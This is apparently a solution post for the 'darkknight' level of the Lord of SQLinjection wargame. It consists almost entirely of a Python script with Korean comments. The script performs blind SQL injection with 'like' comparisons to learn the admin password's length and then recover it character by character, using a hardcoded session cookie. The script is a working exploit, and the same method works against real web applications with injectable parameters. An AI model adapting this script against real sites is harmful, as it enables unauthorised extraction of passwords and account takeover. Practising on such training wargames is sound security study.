(los[Lord of SQLinjection]) DARKNIGHT

 

import requests password = "" for k in range(1, 20): url = "https://los.eagle-jump.org/darkknight_f76e2eebfeeeec2b7699a9ae976f574d.php?pw=&no=1 or id like %22admin%22 and length(pw) like " + str(k) r = requests.post(url, cookies=(dict(PHPSESSID="2o4ge7l7skce4kl1qhl8kkq404"))) print("try password length = " + str(k)) if 'Hello admin' in r.text: print("[+] find password length = " + str(k)) for j in range(1, k+1): # 1~8자리 패스워드를 찾아야함 print("%d" % j) # 현재 몇번째 인지 표시 for i in range(48, 128): # 대부분의 글자들 다 찾아내기 if 58 <= i <= 64: continue if 91 <= i <= 96: continue try: # 시작! url = "https://los.eagle-jump.org/darkknight_f76e2eebfeeeec2b7699a9ae976f574d.php?pw=&no=1 or id like %22admin%22 and right(left(pw," + str(j) + "),1) like %22" + chr(i) + "%22%23" # print(url) r = requests.post(url, cookies=(dict(PHPSESSID="2o4ge7l7skce4kl1qhl8kkq404"))) # 자신의 Session ID를 넣어야함. print(str(j) + "번째 찾는 중 : " + chr(i)) # 대략적인 현재 위치를 확인하기 위함, 없어도 되는 코드 except: # 예외는 반드시! print("Error") continue if 'Hello admin' in r.text: # 글자를 찾았을 경우! password = password + chr(i) print("[+]Password : " + password) break break